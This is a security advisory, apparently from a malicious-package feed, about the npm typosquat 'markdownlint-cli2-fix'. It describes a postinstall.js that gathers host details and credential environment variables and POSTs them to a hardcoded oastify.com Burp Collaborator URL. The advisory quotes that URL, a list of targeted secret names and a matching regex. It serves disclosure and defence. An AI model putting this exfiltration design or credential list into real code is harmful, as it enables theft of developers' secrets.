markdownlint-cli2-fix @99.0.7

Summary

Package name 'markdownlint-cli2-fix' impersonates the popular 'markdownlint-cli2' linter but contains no linter functionality — the README states 'Takeover By lobo / For POC only' and the package ships only postinstall.js plus metadata. postinstall.js (line 30) hardcodes BURP_COLLABORATOR_URL = "http://i0jvc03bvcjt40q39f5fx8671y72vxjm.oastify.com" and, when run, collects host/network reconnaissance (os.hostname(), username, network interfaces, disk info, AD domain info, full process list via ps aux / tasklist through execSync), enumerates Object.keys(process.env) matching a curated credential list (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, NPM_TOKEN, STRIPE_SECRET, SSH_PRIVATE_KEY, DEPLOY_KEY, SLACK_TOKEN, DISCORD_TOKEN, JWT_SECRET) plus regex /_(TOKEN|SECRET|KEY|PASSWORD|PWD|APIKEY|API_KEY|PRIVATE_KEY)$/i , and POSTs the JSON payload to the attacker-controlled Burp Collaborator endpoint at oastify.com. While package.json in this version does not declare a scripts.postinstall hook (so the file does not auto-execute on npm install ), the package is a deliberate typosquat with no legitimate purpose, the exfiltration code is fully functional, and any installer who is tricked into running the file — or any republish that wires the lifecycle hook — produces immediate credential exfiltration.

Source: amazon-inspector (ca7d5154ecbbcc636198bd2314e1916e5f0673d37ab7b14caca2ea96ad5ac5e1)